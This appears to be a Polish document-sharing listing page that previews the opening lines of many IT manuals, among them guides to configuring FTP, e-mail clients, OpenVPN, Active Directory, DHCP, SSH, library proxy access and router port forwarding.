1. Informacje ogólne. Polityka prywatności (Pliki Cookies) 1. Informacje ogólne. Lęborskie Centrum Kultury Fregata 1. Operatorem Serwisu www.lck-fregata.pl jest L?borskie Centrum Kultury "Fregata" z siedzib? w L?borku (84-300),

Bardziej szczegółowo

Wstęp. Skąd pobrać program do obsługi FTP? Logowanie

Wstęp. Skąd pobrać program do obsługi FTP? Logowanie Wstęp FTP - (ang. File Transfer Protocol - protokół transmisji danych) jest to protokół typu klient-serwer, który umożliwia przesyłanie plików na serwer, oraz z serwera poprzez program klienta FTP. Dzięki

Bardziej szczegółowo

Instrukcja instalacji usługi Sygnity Service

Instrukcja instalacji usługi Sygnity  Service Instrukcja instalacji usługi Sygnity EmailService Usługa Sygnity EmailService jest przeznaczona do wysyłania wiadomości pocztą elektroniczną do klientów zarejestrowanych w Systemach Dziedzinowych Sygnity

Bardziej szczegółowo

INSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO

INSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO INSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO UWAGA!!! Wskazówki dotyczą wybranych klientów pocztowych Zespół Systemów Sieciowych Spis treści 1. Konfiguracja klienta pocztowego Outlook Express 3 2. Konfiguracja

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

4. Podstawowa konfiguracja

4. Podstawowa konfiguracja 4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić

Bardziej szczegółowo

VinCent Administrator

VinCent Administrator VinCent Administrator Moduł Zarządzania podatnikami Krótka instrukcja obsługi ver. 1.01 Zielona Góra, grudzień 2005 1. Przeznaczenie programu Program VinCent Administrator przeznaczony jest dla administratorów

Bardziej szczegółowo

Pracownia internetowa w szkole ZASTOSOWANIA

Pracownia internetowa w szkole ZASTOSOWANIA NR ART/SBS/07/01 Pracownia internetowa w szkole ZASTOSOWANIA Artykuły - serwery SBS i ich wykorzystanie Instalacja i Konfiguracja oprogramowania MOL Optiva na szkolnym serwerze (SBS2000) Artykuł opisuje

Bardziej szczegółowo

Oprogramowanie OpenVPN jest oprogramowaniem darmowym, które można pobrać ze strony:

Oprogramowanie OpenVPN jest oprogramowaniem darmowym, które można pobrać ze strony: Aby móc korzystać z bazy publikacji elektronicznych należy: 1) posiadać konto w usłudze LDAP (konto logowania do Internetu), 2) zainstalować i skonfigurować oprogramowanie OpenVPN na swoim komputerze,

Bardziej szczegółowo

Instrukcja obsługi programu Pilot PS 5rc

Instrukcja obsługi programu Pilot PS 5rc Instrukcja obsługi programu Pilot PS 5rc Spis treci 1.Wprowadzenie....3 2. Wymagania....3 3. Instalacja oprogramowania...3 4. Uruchomienie Programu...5 4.1. Menu główne...5 4.2. Zakładki...6 5. Praca z

Bardziej szczegółowo

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Spis treści 1. Konfiguracja poczty Exchange dla klienta pocztowego Outlook 2007 protokół Exchange

Bardziej szczegółowo

DLA DREAMBOX & FLASHWIZARD

DLA DREAMBOX & FLASHWIZARD INSTALACJA I KONFIGURACJA NFS SERVER DLA DREAMBOX & FLASHWIZARD z wykorzystaniem MS Services for Unix Wymagania: Windows 2000 lub XP Professional System plików NTFS Pliki Passwd & Group które kopiujemy

Bardziej szczegółowo

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy

Bardziej szczegółowo

Wykonać Ćwiczenie: Active Directory, konfiguracja Podstawowa

Wykonać Ćwiczenie: Active Directory, konfiguracja Podstawowa Wykonać Ćwiczenie: Active Directory, konfiguracja Podstawowa Instalacja roli kontrolera domeny, Aby zainstalować rolę kontrolera domeny, należy uruchomić Zarządzenie tym serwerem, po czym wybrać przycisk

Bardziej szczegółowo

Instalacja i konfiguracja Symfonia.Common.Server oraz Symfonia.Common.Forte

Instalacja i konfiguracja Symfonia.Common.Server oraz Symfonia.Common.Forte Instalacja i konfiguracja Symfonia.Common.Server oraz Symfonia.Common.Forte Instalacja Symfonia.Common.Server 0 2 Spis treści Spis treści 2 Instalacja Symfonia.Common.Server 3 Ważne zalecenia... 3 Konfiguracja

Bardziej szczegółowo

4CMSystem. Podrcznik uytkownika. Strona projektu: http://cms.4proweb.net. Realizacja projektu: 2004 2005

4CMSystem. Podrcznik uytkownika. Strona projektu: http://cms.4proweb.net. Realizacja projektu: 2004 2005 4CMSystem Podrcznik uytkownika Stworzone przez grup 4proweb.net Strona projektu: http://cms.4proweb.net Realizacja projektu: 2004 2005 Programista, administrator Marcin Iwaniec, miwaniec@4proweb.net Autor

Bardziej szczegółowo

Instrukcja instalacji usługi Sygnity Service

Instrukcja instalacji usługi Sygnity  Service Instrukcja instalacji usługi Sygnity EmailService Usługa Sygnity EmailService jest przeznaczona do wysyłania wiadomości pocztą elektroniczną do klientów zarejestrowanych w Systemach Dziedzinowych Sygnity

Bardziej szczegółowo

Twoja instrukcja użytkownika HP PAVILION DV6-1215SA

Twoja instrukcja użytkownika HP PAVILION DV6-1215SA Możesz przeczytać rekomendacje w przewodniku, specyfikacji technicznej lub instrukcji instalacji dla HP PAVILION DV6-1215SA. Znajdziesz odpowiedź na wszystkie pytania w instrukcji dla HP PAVILION DV6-1215SA

Bardziej szczegółowo

Tomasz Greszata - Koszalin

Tomasz Greszata - Koszalin T: Usługi serwerowe w systemie Windows - telnet. Zadanie1: Sprawdź informacje w serwisie Wikipedii na temat usługi telnet. Telnet standard protokołu komunikacyjnego używanego w sieciach komputerowych do

Bardziej szczegółowo

Instrukcja instalacji usługi Sygnity SmsService

Instrukcja instalacji usługi Sygnity SmsService Instrukcja instalacji usługi Sygnity SmsService Usługa Sygnity SmsService jest przeznaczone do wysyłania wiadomości tekstowych na telefony klientów zarejestrowanych w Systemach Dziedzinowych Sygnity wykorzystywanych

Bardziej szczegółowo

Wzorcowy załcznik techniczny, do umowy w sprawie przesyłania faktur elektronicznych pomidzy Firm A oraz Firm B

Wzorcowy załcznik techniczny, do umowy w sprawie przesyłania faktur elektronicznych pomidzy Firm A oraz Firm B Wzorcowy załcznik techniczny, do umowy w sprawie przesyłania faktur elektronicznych pomidzy Firm A oraz Firm B Wersja draft 2.1 Na podstawie: Europejskiej Modelowej Umowy o EDI (w skrócie: EMUoE). 1. Standardy

Bardziej szczegółowo

Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego

Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego Rzeszów, 2012-04-03 Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego 1. Obsługiwane przeglądarki internetowe...2 2. Uwagi odnośnie serwerów proxy...2 3.

Bardziej szczegółowo

INSTRUKCJA INSTALACJI I PIERWSZEGO URUCHOMIENIA APLIKACJI Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy

INSTRUKCJA INSTALACJI I PIERWSZEGO URUCHOMIENIA APLIKACJI Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy INSTRUKCJA INSTALACJI I PIERWSZEGO URUCHOMIENIA APLIKACJI Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy Instalacja systemu Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy System Rodzajowa Ewidencja

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja Jesień 2007)

Pracownia internetowa w każdej szkole (edycja Jesień 2007) Instrukcja numer D1/02_04/D5 Pracownia internetowa w każdej szkole (edycja Jesień 2007) Opiekun pracowni internetowej cz. 1 (D1) Dostęp do grup dyskusyjnych na szkolnym serwerze Jak skonfigurować dostęp

Bardziej szczegółowo

Instrukcja Obsugi Programu

Instrukcja Obsugi Programu sprawozdania jednostkowe Instrukcja Obsugi Programu cz administracyjna ód 2004 Spis treci 1. Jak zainstalowa program Budet JB Plus?... 2 1.1 Pena instalacja... 2 1.2 Aktualizacja... 3 1.3 Odinstalowanie

Bardziej szczegółowo

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.

Bardziej szczegółowo

INSTRUKCJA INSTALACJI SYSTEMU

INSTRUKCJA INSTALACJI SYSTEMU Zarządzanie Procesami Informatycznymi Sp. z o.o. 54-204 Wrocław, ul. Legnicka 62 Tel. : ( 071 ) 354 88 88 Fax : ( 071 ) 354 88 99 E-mail : biuro@vilico.pl INSTRUKCJA INSTALACJI SYSTEMU Wersja 1.4-1 - Spis

Bardziej szczegółowo

Kompilacja image z CVS

Kompilacja image z CVS Kompilacja image z CVS Tworzenie image na Dreamboxa nie jest tajemnic, a opis czynnoci, jakie naley wykona, aby stworzy własny soft mona znale na wikszoci niemieckich stron traktujcych o Dreamboxach. Kto

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Pracownia internetowa w każdej szkole (edycja jesień 2005) Instrukcja numer SPD3/12_02/Z Pracownia internetowa w każdej szkole (edycja jesień 2005) Opiekun pracowni internetowej cz. 3 Instalacja programu phpmyadmin (PD3) Zadanie 1 Program phpmyadmin jest jednym

Bardziej szczegółowo

Instalacja Altium Designer Powizane wideo Altium Designer - Installation and Management

Instalacja Altium Designer Powizane wideo Altium Designer - Installation and Management Instalacja Altium Designer Powizane wideo Altium Designer - Installation and Management Nadrzdny artyku: Pierwsze kroki z Altium Designer Podstawow metod instalacji Altium Designer (od wersji Altium Designer

Bardziej szczegółowo

Pakiet informacyjny dla nowych użytkowników usługi Multimedia Internet świadczonej przez Multimedia Polska S.A. z siedzibą w Gdyni

Pakiet informacyjny dla nowych użytkowników usługi Multimedia Internet świadczonej przez Multimedia Polska S.A. z siedzibą w Gdyni Pakiet informacyjny dla nowych użytkowników usługi Multimedia Internet świadczonej przez Multimedia Polska S.A. z siedzibą w Gdyni Rozdział I Konfiguracja komputera do pracy w sieci Multimedia w systemie

Bardziej szczegółowo

Zastosowanie programu Microsoft Excel do analizy wyników nauczania

Zastosowanie programu Microsoft Excel do analizy wyników nauczania Grayna Napieralska Zastosowanie programu Microsoft Excel do analizy wyników nauczania Koniecznym i bardzo wanym elementem pracy dydaktycznej nauczyciela jest badanie wyników nauczania. Prawidłow analiz

Bardziej szczegółowo

Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK. I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej)

Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK. I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej) Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej) Uruchom maszynę wirtualną Server 2008 Zaloguj się do konta

Bardziej szczegółowo

Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera.

Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera. Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera. Wchodzimy w Centrum sieci -> Połączenia sieciowe -> następnie do właściwości naszej karty sieciowej. Następnie przechodzimy do Protokół internetowy

Bardziej szczegółowo

Instrukcja dla pracowników Uniwersytetu Rzeszowskiego.

Instrukcja dla pracowników Uniwersytetu Rzeszowskiego. Dost p!do!infrastruktury!informatycznej. Instrukcja dla pracowników Uniwersytetu Rzeszowskiego. Wersja dokumentu: 1.0.0 Rzeszów: 23.10.2009 OPTeam S.A. 35-032 Rzeszów, ul. Lisa Kuli 3 INFORMACJA O NOWYCH

Bardziej szczegółowo

Klient poczty elektronicznej - Thunderbird

Klient poczty elektronicznej - Thunderbird Klient poczty elektronicznej - Thunderbird Wstęp Wstęp Klient poczty elektronicznej, to program który umożliwia korzystanie z poczty bez konieczności logowania się na stronie internetowej. Za jego pomocą

Bardziej szczegółowo

Instalacja i konfiguracja serwera IIS z FTP

Instalacja i konfiguracja serwera IIS z FTP Instalacja i konfiguracja serwera IIS z FTP IIS (Internet Information Services) jest to usługa dostępna w systemach z rodziny Windows Server, pozwalająca na obsługę i utrzymanie własnych stron WWW oraz

Bardziej szczegółowo

Wskazówki do instalacji Systemu Symfonia Forte. Szybki start

Wskazówki do instalacji Systemu Symfonia Forte. Szybki start Wskazówki do instalacji Systemu Symfonia Forte Szybki start Powielanie w jakiejkolwiek formie całości lub fragmentów podręcznika bez pisemnej zgody firmy Sage Symfonia Sp. z o.o. jest zabronione. Copyright

Bardziej szczegółowo

Biuletyn techniczny. CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych. Copyright 2007 COMARCH SA

Biuletyn techniczny. CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych. Copyright 2007 COMARCH SA Biuletyn techniczny CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych Copyright 2007 COMARCH SA 1 Spis treści 1 SPIS TREŚCI... 2 2 DRUKARKI FISKALNE W USŁUGACH TERMINALOWYCH... 3 2.1 2.2 INSTALACJA

Bardziej szczegółowo

OBSŁUGA I KONFIGURACJA SIECI W WINDOWS

OBSŁUGA I KONFIGURACJA SIECI W WINDOWS OBSŁUGA I KONFIGURACJA SIECI W WINDOWS Jak skonfigurować komputer pracujący pod kontrolą systemu operacyjnego Windows 7, tak aby uzyskać dostęp do internetu? Zakładamy, że komputer pracuje w małej domowej

Bardziej szczegółowo

Poradnik cz.1 Użycie połączenia SSH

Poradnik cz.1 Użycie połączenia SSH Poradnik cz.1 Użycie połączenia SSH W niniejszej części pokażę jak zalogować się na serwer w trybie graficznym. Protokół SSH służy do komunikowania się między klientem a serwerem. Jest to ulepszona wersja

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat usługi DHCP.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat usługi DHCP. T: Konfiguracja usługi DHCP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat usługi DHCP. DHCP (ang. Dynamic Host Configuration Protocol) protokół komunikacyjny

Bardziej szczegółowo

Dostp do zasobów dyskowych uytkowników lcme10 przez protokół SMB (Microsoft Networking)

Dostp do zasobów dyskowych uytkowników lcme10 przez protokół SMB (Microsoft Networking) Dostp do zasobów dyskowych uytkowników lcme10 przez protokół SMB (Microsoft Networking) Powered by: Od 20 stycznia 2003 roku wszyscy u ytkownicy serwera lcme10, posiadajcy konta w domenie SE-AD Instytutu

Bardziej szczegółowo

1 Implementowanie i konfigurowanie infrastruktury wdraŝania systemu Windows... 1

1 Implementowanie i konfigurowanie infrastruktury wdraŝania systemu Windows... 1 Spis treści Wstęp... xi Wymagania sprzętowe (Virtual PC)... xi Wymagania sprzętowe (fizyczne)... xii Wymagania programowe... xiii Instrukcje instalowania ćwiczeń... xiii Faza 1: Tworzenie maszyn wirtualnych...

Bardziej szczegółowo

SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja

SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja Instytut Telekomunikacji Wydział Elektroniki i Technik Informacyjnych Politechnika Warszawska, marzec 2015 Wprowadzenie Ćwiczenie jest wykonywane

Bardziej szczegółowo

PRZYKŁAD ROZWIZANIA ZADANIAZ INFORMATORA DO ETAPU PRAKTYCZNEGO EGZAMINU W ZAWODZIE TECHNIK INFORMATYK

PRZYKŁAD ROZWIZANIA ZADANIAZ INFORMATORA DO ETAPU PRAKTYCZNEGO EGZAMINU W ZAWODZIE TECHNIK INFORMATYK PRZYKŁAD ROZWIZANIA ZADANIAZ INFORMATORA DO ETAPU PRAKTYCZNEGO EGZAMINU W ZAWODZIE TECHNIK INFORMATYK 1. Tytuł pracy egzaminacyjnej Opracowanie projektu realizacji prac prowadzcych do lokalizacji i usunicia

Bardziej szczegółowo

Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego

Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego Rzeszów, 2017-10-12 Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego 1. Obsługiwane przeglądarki internetowe... 2 2. Uwagi odnośnie serwerów proxy... 2

Bardziej szczegółowo

KORZYSTANIE Z BAZY DANYCH UpToDate

KORZYSTANIE Z BAZY DANYCH UpToDate KORZYSTANIE Z BAZY DANYCH UpToDate 1 KORZYSTANIE Z BAZY DANYCH UpToDate 1. Wejdź na stronę Biblioteki Głównej Uniwersytetu Medycznego w Lublinie: http://www.biblioteka.umlub.pl 2. W ZASOBY kliknij na Zdalny

Bardziej szczegółowo

Autorzy: Kraków, stycze 2007 Łukasz Dziewanowski Filip Haftek (studenci AGH III roku kierunku Automatyka i Robotyka)

Autorzy: Kraków, stycze 2007 Łukasz Dziewanowski Filip Haftek (studenci AGH III roku kierunku Automatyka i Robotyka) Autorzy: Kraków, stycze 2007 Łukasz Dziewanowski Filip Haftek (studenci AGH III roku kierunku Automatyka i Robotyka) PROGRAM DO OBSŁUGI TELEFONU KOMÓRKOWEGO I. Instalacja: MOLIWOCI POŁCZENIA TELEFONU Z

Bardziej szczegółowo

Instrukcja instalacji usługi Sygnity SmsService

Instrukcja instalacji usługi Sygnity SmsService Instrukcja instalacji usługi Sygnity SmsService Usługa Sygnity SmsService jest przeznaczone do wysyłania wiadomości tekstowych na telefony klientów zarejestrowanych w Systemach Dziedzinowych Sygnity wykorzystywanych

Bardziej szczegółowo

Errata. Instalacja sklepu internetowego

Errata. Instalacja sklepu internetowego Errata. Instalacja sklepu internetowego Aplikacja sklepu internetowego została napisana i przetestowana w rodowisku PHP 4 oraz MySQL 4.0. Poniewa jednak na płycie CD-ROM dołczonej do ksiki znajduje si

Bardziej szczegółowo

Windows Server Active Directory

Windows Server Active Directory Windows Server 2012 - Active Directory Active Directory (AD) To usługa katalogowa a inaczej mówiąc hierarchiczna baza danych, która przynajmniej częściowo musi być ściśle związana z obiektową bazą danych.

Bardziej szczegółowo

Instrukcja instalacji i konfiguracji Karty EDGE/GPRS SonyEricsson GC85

Instrukcja instalacji i konfiguracji Karty EDGE/GPRS SonyEricsson GC85 Instrukcja instalacji i konfiguracji Karty EDGE/GPRS SonyEricsson GC85 SPIS TREŚCI SPIS TREŚCI...2 WSTĘP...2 INSTRUKCJA INSTALACJI I KONFIGURACJI...3 SCHEMAT INSTALACJI KARTY SIM W SE GC85...3 INSTALACJA

Bardziej szczegółowo

Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego

Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego Rzeszów, 2015-10-21 Zdalny dostęp do źródeł elektronicznych BUR dla pracowników i studentów Uniwersytetu Rzeszowskiego 1. Obsługiwane przeglądarki internetowe...2 2. Uwagi odnośnie serwerów proxy...2 3.

Bardziej szczegółowo

Planowanie adresacji IP dla przedsibiorstwa.

Planowanie adresacji IP dla przedsibiorstwa. Planowanie adresacji IP dla przedsibiorstwa. Wstp Przy podejciu do planowania adresacji IP moemy spotka si z 2 głównymi przypadkami: planowanie za pomoc adresów sieci prywatnej przypadek, w którym jeeli

Bardziej szczegółowo

Problemy techniczne SQL Server

Problemy techniczne SQL Server Problemy techniczne SQL Server Co zrobić, jeśli program Optivum nie łączy się poprzez sieć lokalną z serwerem SQL? Programy Optivum, które korzystają z bazy danych umieszczonej na serwerze SQL, mogą być

Bardziej szczegółowo

Microsoft Authenticode. Uycie certyfikatów niekwalifikowanych do podpisywania kodu w technologii MS Authenticode. wersja 1.1 UNIZETO TECHNOLOGIES SA

Microsoft Authenticode. Uycie certyfikatów niekwalifikowanych do podpisywania kodu w technologii MS Authenticode. wersja 1.1 UNIZETO TECHNOLOGIES SA Microsoft Authenticode Uycie certyfikatów niekwalifikowanych do podpisywania kodu w technologii MS Authenticode wersja 1.1 Spis treci 1. WSTP... 3 2. TWORZENIE KLUCZA PRYWATNEGO I CERTYFIKATU... 3 3. INSTALOWANIE

Bardziej szczegółowo

9. Internet. Konfiguracja połączenia z Internetem

9. Internet. Konfiguracja połączenia z Internetem 9. Internet Ćwiczenia zawarte w tym rozdziale pozwolą na bezpieczne podłączenie komputera (lub całej sieci lokalnej) do Internetu. Firma Microsoft nie zrezygnowała z umieszczania w systemie przeglądarki

Bardziej szczegółowo

SYSTEM PROXY. Zdalny dostęp do zasobów elektronicznych BGiOINT Politechniki Wrocławskiej

SYSTEM PROXY. Zdalny dostęp do zasobów elektronicznych BGiOINT Politechniki Wrocławskiej SYSTEM PROXY Zdalny dostęp do zasobów elektronicznych BGiOINT Politechniki Wrocławskiej 1. Przeglądarki internetowe obsługujące system proxy 2 2. Uwagi na temat serwerów proxy 2 3. Konfiguracja przeglądarki

Bardziej szczegółowo

Studium przypadku Case Study CCNA2-ROUTING

Studium przypadku Case Study CCNA2-ROUTING Na podstawie oryginału CISCO, przygotował: mgr in. Jarosław Szybiski Studium przypadku Case Study CCNA2-ROUTING Ogólne załoenia dla projektu Przegld i cele Podczas tego wiczenia uczestnicy wykonaj zadanie

Bardziej szczegółowo

Przykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional)

Przykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional) Przykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional) KROK NR 1: Uruchamiamy program Outlook Express. Jesteśmy proszeni o nazwę tożsamości.

Bardziej szczegółowo

Jak wykorzystać Pulpit Zdalny w Windows 2003 Serwer do pracy z programem FAKT

Jak wykorzystać Pulpit Zdalny w Windows 2003 Serwer do pracy z programem FAKT Jak wykorzystać Pulpit Zdalny w Windows 2003 Serwer do pracy z programem FAKT Planując uruchomienie programu FAKT na wielu stanowiskach w sieci możemy wykorzystać możliwości oprogramowania Windows Serwer

Bardziej szczegółowo

System Connector Opis wdrożenia systemu

System Connector Opis wdrożenia systemu System Connector Opis wdrożenia systemu Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Spistre ci Wymagania z perspektywy Powiatowego Urzdu Pracy... 3

Bardziej szczegółowo

10.2. Udostępnianie zasobów

10.2. Udostępnianie zasobów Rozdział 10 t Praca w sieci równoprawnej Aby komputer mógł być widoczny wśród innych w otoczeniu sieciowym, musi mieć unikalną nazwę i przynależeć do grupy roboczej. Ustawienia te dostępne są poprzez aplet

Bardziej szczegółowo

Program kadrowo płacowy - wersja wielodostępna z bazą danych Oracle SQL Server 8 lub 9

Program kadrowo płacowy - wersja wielodostępna z bazą danych Oracle SQL Server 8 lub 9 Program kadrowo płacowy - wersja wielodostępna z bazą danych Oracle SQL Server 8 lub 9 Uwaga: Masz problem z programem lub instalacją? Nie możesz wykonać wymaganej czynności? Daj nam znać. W celu uzyskania

Bardziej szczegółowo

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej:

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Router jest podłączony do sieci Internet, natomiast od dostawcy

Bardziej szczegółowo

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Router jest podłączony do sieci Internet, natomiast od dostawcy zostaje

Bardziej szczegółowo

Zdalny dostęp do zasobów elektronicznych BGiOINT dla pracowników Politechniki Wrocławskiej

Zdalny dostęp do zasobów elektronicznych BGiOINT dla pracowników Politechniki Wrocławskiej Wrocław, 2010-09-23 Zdalny dostęp do zasobów elektronicznych BGiOINT dla pracowników Politechniki Wrocławskiej 1 Obsługiwane przeglądarki internetowe 2 2 Uwagi odnośnie serwerów proxy 2 3 Konfiguracja

Bardziej szczegółowo

INSTALACJA LICENCJI SIECIOWEJ NET HASP Wersja 8.32

INSTALACJA LICENCJI SIECIOWEJ NET HASP Wersja 8.32 INSTALACJA LICENCJI SIECIOWEJ NET HASP Wersja 8.32 Spis Treści 1. Wymagania... 2 1.1. Wymagania przy korzystaniu z klucza sieciowego... 2 1.2. Wymagania przy uruchamianiu programu przez internet... 2 2.

Bardziej szczegółowo

Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce WWW

Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce WWW Instytut Sterowania i Systemów Informatycznych Uniwersytet Zielonogórski Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce

Bardziej szczegółowo

Instrukcje dotyczące systemu Windows w przypadku drukarki podłączonej lokalnie

Instrukcje dotyczące systemu Windows w przypadku drukarki podłączonej lokalnie Strona 1 z 6 Połączenia Instrukcje dotyczące systemu Windows w przypadku drukarki podłączonej lokalnie Uwaga: Przy instalowaniu drukarki podłączonej lokalnie, jeśli dysk CD-ROM Oprogramowanie i dokumentacja

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. T: Konfiguracja usługi ftp w systemie Windows 8.1. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. FTP (ang. File Transfer Protocol) protokół transferu plików umożliwiający

Bardziej szczegółowo

Przed instalacj naley sprawdzi wersj posiadanych sterowników urzdzenia. Powinna by nie starsza ni:

Przed instalacj naley sprawdzi wersj posiadanych sterowników urzdzenia. Powinna by nie starsza ni: Instalacja karty TechniSat Sky Star 2 Przed instalacj naley sprawdzi wersj posiadanych sterowników urzdzenia. Powinna by nie starsza ni: DriverVer = 07/08/2003 4.2.8.9999 Po zainstalowaniu karty na złczu

Bardziej szczegółowo

Kancelaria Prawna.WEB - POMOC

Kancelaria Prawna.WEB - POMOC Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV

Bardziej szczegółowo